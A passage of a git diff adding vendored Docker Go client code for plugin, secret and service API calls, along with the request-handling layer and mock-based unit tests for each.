t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginList(t *testing.T) { + expectedURL := "/plugins" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal([]*types.Plugin{ + { + ID: "plugin_id1", + }, + { + ID: "plugin_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + plugins, err := client.PluginList(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(plugins) != 2 { + t.Fatalf("expected 2 plugins, got %v", plugins) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go new file mode 100644 index 0000000000..1e5f963251 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_push.go @@ -0,0 +1,17 @@ +package client + +import ( + "io" + + "golang.org/x/net/context" +) + +// PluginPush pushes a plugin to a registry +func (cli *Client) PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + resp, err := cli.post(ctx, "/plugins/"+name+"/push", nil, nil, headers) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go new file mode 100644 index 0000000000..d9f70cdff8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_push_test.go @@ -0,0 +1,51 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestPluginPushError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.PluginPush(context.Background(), "plugin_name", "") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginPush(t *testing.T) { + expectedURL := "/plugins/plugin_name" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + auth := req.Header.Get("X-Registry-Auth") + if auth != "authtoken" { + return nil, fmt.Errorf("Invalid auth header : expected 'authtoken', got %s", auth) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + _, err := client.PluginPush(context.Background(), "plugin_name", "authtoken") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go new file mode 100644 index 0000000000..b017e4d348 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_remove.go @@ -0,0 +1,20 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginRemove removes a plugin +func (cli *Client) PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/plugins/"+name, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go new file mode 100644 index 0000000000..a15f1661f6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestPluginRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginRemove(t *testing.T) { + expectedURL := "/plugins/plugin_name" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_set.go b/vendor/github.com/docker/docker/client/plugin_set.go new file mode 100644 index 0000000000..3260d2a90d --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_set.go @@ -0,0 +1,12 @@ +package client + +import ( + "golang.org/x/net/context" +) + +// PluginSet modifies settings for an existing plugin +func (cli *Client) PluginSet(ctx context.Context, name string, args []string) error { + resp, err := cli.post(ctx, "/plugins/"+name+"/set", nil, args, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go new file mode 100644 index 0000000000..2450254463 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_set_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestPluginSetError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginSet(context.Background(), "plugin_name", []string{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginSet(t *testing.T) { + expectedURL := "/plugins/plugin_name/set" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginSet(context.Background(), "plugin_name", []string{"arg1"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go new file mode 100644 index 0000000000..95a4356b97 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go @@ -0,0 +1,37 @@ +package client + +import ( + "fmt" + "io" + "net/url" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// PluginUpgrade upgrades a plugin +func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + query := url.Values{} + if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + return nil, errors.Wrap(err, "invalid remote reference") + } + query.Set("remote", options.RemoteRef) + + privileges, err := cli.checkPluginPermissions(ctx, query, options) + if err != nil { + return nil, err + } + + resp, err := cli.tryPluginUpgrade(ctx, query, privileges, name, options.RegistryAuth) + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers) +} diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go new file mode 100644 index 0000000000..ac05363655 --- /dev/null +++ b/vendor/github.com/docker/docker/client/request.go @@ -0,0 +1,247 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/pkg/errors" + "golang.org/x/net/context" + "golang.org/x/net/context/ctxhttp" +) + +// serverResponse is a wrapper for http API responses. +type serverResponse struct { + body io.ReadCloser + header http.Header + statusCode int +} + +// head sends an http request to the docker API using the method HEAD. +func (cli *Client) head(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "HEAD", path, query, nil, headers) +} + +// getWithContext sends an http request to the docker API using the method GET with a specific go context. +func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "GET", path, query, nil, headers) +} + +// postWithContext sends an http request to the docker API using the method POST with a specific go context. +func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { + body, headers, err := encodeBody(obj, headers) + if err != nil { + return serverResponse{}, err + } + return cli.sendRequest(ctx, "POST", path, query, body, headers) +} + +func (cli *Client) postRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "POST", path, query, body, headers) +} + +// put sends an http request to the docker API using the method PUT. +func (cli *Client) put(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { + body, headers, err := encodeBody(obj, headers) + if err != nil { + return serverResponse{}, err + } + return cli.sendRequest(ctx, "PUT", path, query, body, headers) +} + +// put sends an http request to the docker API using the method PUT. +func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "PUT", path, query, body, headers) +} + +// delete sends an http request to the docker API using the method DELETE. +func (cli *Client) delete(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { + return cli.sendRequest(ctx, "DELETE", path, query, nil, headers) +} + +type headers map[string][]string + +func encodeBody(obj interface{}, headers headers) (io.Reader, headers, error) { + if obj == nil { + return nil, headers, nil + } + + body, err := encodeData(obj) + if err != nil { + return nil, headers, err + } + if headers == nil { + headers = make(map[string][]string) + } + headers["Content-Type"] = []string{"application/json"} + return body, headers, nil +} + +func (cli *Client) buildRequest(method, path string, body io.Reader, headers headers) (*http.Request, error) { + expectedPayload := (method == "POST" || method == "PUT") + if expectedPayload && body == nil { + body = bytes.NewReader([]byte{}) + } + + req, err := http.NewRequest(method, path, body) + if err != nil { + return nil, err + } + req = cli.addHeaders(req, headers) + + if cli.proto == "unix" || cli.proto == "npipe" { + // For local communications, it doesn't matter what the host is. We just + // need a valid and meaningful host name. (See #189) + req.Host = "docker" + } + + req.URL.Host = cli.addr + req.URL.Scheme = cli.scheme + + if expectedPayload && req.Header.Get("Content-Type") == "" { + req.Header.Set("Content-Type", "text/plain") + } + return req, nil +} + +func (cli *Client) sendRequest(ctx context.Context, method, path string, query url.Values, body io.Reader, headers headers) (serverResponse, error) { + req, err := cli.buildRequest(method, cli.getAPIPath(path, query), body, headers) + if err != nil { + return serverResponse{}, err + } + return cli.doRequest(ctx, req) +} + +func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) { + serverResp := serverResponse{statusCode: -1} + + resp, err := ctxhttp.Do(ctx, cli.client, req) + if err != nil { + if cli.scheme != "https" && strings.Contains(err.Error(), "malformed HTTP response") { + return serverResp, fmt.Errorf("%v.\n* Are you trying to connect to a TLS-enabled daemon without TLS?", err) + } + + if cli.scheme == "https" && strings.Contains(err.Error(), "bad certificate") { + return serverResp, fmt.Errorf("The server probably has client authentication (--tlsverify) enabled. Please check your TLS client certification settings: %v", err) + } + + // Don't decorate context sentinel errors; users may be comparing to + // them directly. + switch err { + case context.Canceled, context.DeadlineExceeded: + return serverResp, err + } + + if nErr, ok := err.(*url.Error); ok { + if nErr, ok := nErr.Err.(*net.OpError); ok { + if os.IsPermission(nErr.Err) { + return serverResp, errors.Wrapf(err, "Got permission denied while trying to connect to the Docker daemon socket at %v", cli.host) + } + } + } + + if err, ok := err.(net.Error); ok { + if err.Timeout() { + return serverResp, ErrorConnectionFailed(cli.host) + } + if !err.Temporary() { + if strings.Contains(err.Error(), "connection refused") || strings.Contains(err.Error(), "dial unix") { + return serverResp, ErrorConnectionFailed(cli.host) + } + } + } + + // Although there's not a strongly typed error for this in go-winio, + // lots of people are using the default configuration for the docker + // daemon on Windows where the daemon is listening on a named pipe + // `//./pipe/docker_engine, and the client must be running elevated. + // Give users a clue rather than the not-overly useful message + // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info: + // open //./pipe/docker_engine: The system cannot find the file specified.`. + // Note we can't string compare "The system cannot find the file specified" as + // this is localised - for example in French the error would be + // `open //./pipe/docker_engine: Le fichier spécifié est introuvable.` + if strings.Contains(err.Error(), `open //./pipe/docker_engine`) { + err = errors.New(err.Error() + " In the default daemon configuration on Windows, the docker client must be run elevated to connect. This error may also indicate that the docker daemon is not running.") + } + + return serverResp, errors.Wrap(err, "error during connect") + } + + if resp != nil { + serverResp.statusCode = resp.StatusCode + } + + if serverResp.statusCode < 200 || serverResp.statusCode >= 400 { + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return serverResp, err + } + if len(body) == 0 { + return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL) + } + + var errorMessage string + if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && + resp.Header.Get("Content-Type") == "application/json" { + var errorResponse types.ErrorResponse + if err := json.Unmarshal(body, &errorResponse); err != nil { + return serverResp, fmt.Errorf("Error reading JSON: %v", err) + } + errorMessage = errorResponse.Message + } else { + errorMessage = string(body) + } + + return serverResp, fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage)) + } + + serverResp.body = resp.Body + serverResp.header = resp.Header + return serverResp, nil +} + +func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request { + // Add CLI Config's HTTP Headers BEFORE we set the Docker headers + // then the user can't change OUR headers + for k, v := range cli.customHTTPHeaders { + if versions.LessThan(cli.version, "1.25") && k == "User-Agent" { + continue + } + req.Header.Set(k, v) + } + + if headers != nil { + for k, v := range headers { + req.Header[k] = v + } + } + return req +} + +func encodeData(data interface{}) (*bytes.Buffer, error) { + params := bytes.NewBuffer(nil) + if data != nil { + if err := json.NewEncoder(params).Encode(data); err != nil { + return nil, err + } + } + return params, nil +} + +func ensureReaderClosed(response serverResponse) { + if body := response.body; body != nil { + // Drain up to 512 bytes and close the body to let the Transport reuse the connection + io.CopyN(ioutil.Discard, body, 512) + response.body.Close() + } +} diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go new file mode 100644 index 0000000000..63908aec4b --- /dev/null +++ b/vendor/github.com/docker/docker/client/request_test.go @@ -0,0 +1,92 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// TestSetHostHeader should set fake host for local communications, set real host +// for normal communications. +func TestSetHostHeader(t *testing.T) { + testURL := "/test" + testCases := []struct { + host string + expectedHost string + expectedURLHost string + }{ + { + "unix:///var/run/docker.sock", + "docker", + "/var/run/docker.sock", + }, + { + "npipe:////./pipe/docker_engine", + "docker", + "//./pipe/docker_engine", + }, + { + "tcp://0.0.0.0:4243", + "", + "0.0.0.0:4243", + }, + { + "tcp://localhost:4243", + "", + "localhost:4243", + }, + } + + for c, test := range testCases { + proto, addr, basePath, err := ParseHost(test.host) + if err != nil { + t.Fatal(err) + } + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, testURL) { + return nil, fmt.Errorf("Test Case #%d: Expected URL %q, got %q", c, testURL, req.URL) + } + if req.Host != test.expectedHost { + return nil, fmt.Errorf("Test Case #%d: Expected host %q, got %q", c, test.expectedHost, req.Host) + } + if req.URL.Host != test.expectedURLHost { + return nil, fmt.Errorf("Test Case #%d: Expected URL host %q, got %q", c, test.expectedURLHost, req.URL.Host) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(([]byte("")))), + }, nil + }), + + proto: proto, + addr: addr, + basePath: basePath, + } + + _, err = client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil) + if err != nil { + t.Fatal(err) + } + } +} + +// TestPlainTextError tests the server returning an error in plain text for +// backwards compatibility with API versions <1.24. All other tests use +// errors returned as JSON +func TestPlainTextError(t *testing.T) { + client := &Client{ + client: newMockClient(plainTextErrorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerList(context.Background(), types.ContainerListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go new file mode 100644 index 0000000000..de8b041567 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_create.go @@ -0,0 +1,24 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretCreate creates a new Secret. +func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) { + var headers map[string][]string + + var response types.SecretCreateResponse + resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go new file mode 100644 index 0000000000..cb378c77ff --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_create_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretCreate(t *testing.T) { + expectedURL := "/secrets/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.SecretCreateResponse{ + ID: "test_secret", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusCreated, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "test_secret" { + t.Fatalf("expected `test_secret`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go new file mode 100644 index 0000000000..f774576118 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_inspect.go @@ -0,0 +1,34 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretInspectWithRaw returns the secret information with raw data +func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) { + resp, err := cli.get(ctx, "/secrets/"+id, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return swarm.Secret{}, nil, secretNotFoundError{id} + } + return swarm.Secret{}, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return swarm.Secret{}, nil, err + } + + var secret swarm.Secret + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&secret) + + return secret, body, err +} diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go new file mode 100644 index 0000000000..423d986968 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretInspectSecretNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.SecretInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrSecretNotFound(err) { + t.Fatalf("expected an secretNotFoundError error, got %v", err) + } +} + +func TestSecretInspect(t *testing.T) { + expectedURL := "/secrets/secret_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Secret{ + ID: "secret_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + secretInspect, _, err := client.SecretInspectWithRaw(context.Background(), "secret_id") + if err != nil { + t.Fatal(err) + } + if secretInspect.ID != "secret_id" { + t.Fatalf("expected `secret_id`, got %s", secretInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go new file mode 100644 index 0000000000..7e9d5ec167 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretList returns the list of secrets. +func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/secrets", query, nil) + if err != nil { + return nil, err + } + + var secrets []swarm.Secret + err = json.NewDecoder(resp.body).Decode(&secrets) + ensureReaderClosed(resp) + return secrets, err +} diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go new file mode 100644 index 0000000000..1ac11cddb3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSecretListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SecretList(context.Background(), types.SecretListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretList(t *testing.T) { + expectedURL := "/secrets" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.SecretListOptions + expectedQueryParams map[string]string + }{ + { + options: types.SecretListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.SecretListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Secret{ + { + ID: "secret_id1", + }, + { + ID: "secret_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + secrets, err := client.SecretList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(secrets) != 2 { + t.Fatalf("expected 2 secrets, got %v", secrets) + } + } +} diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go new file mode 100644 index 0000000000..1955b988a9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// SecretRemove removes a Secret. +func (cli *Client) SecretRemove(ctx context.Context, id string) error { + resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go new file mode 100644 index 0000000000..f269f787d2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestSecretRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SecretRemove(context.Background(), "secret_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretRemove(t *testing.T) { + expectedURL := "/secrets/secret_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.SecretRemove(context.Background(), "secret_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/secret_update.go b/vendor/github.com/docker/docker/client/secret_update.go new file mode 100644 index 0000000000..b94e24aab0 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_update.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SecretUpdate updates a Secret. Currently, the only part of a secret spec +// which can be updated is Labels. +func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go new file mode 100644 index 0000000000..c620985bd5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/secret_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSecretUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSecretUpdate(t *testing.T) { + expectedURL := "/secrets/secret_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go new file mode 100644 index 0000000000..3d1be225bd --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_create.go @@ -0,0 +1,30 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceCreate creates a new Service. +func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) { + var headers map[string][]string + + if options.EncodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {options.EncodedRegistryAuth}, + 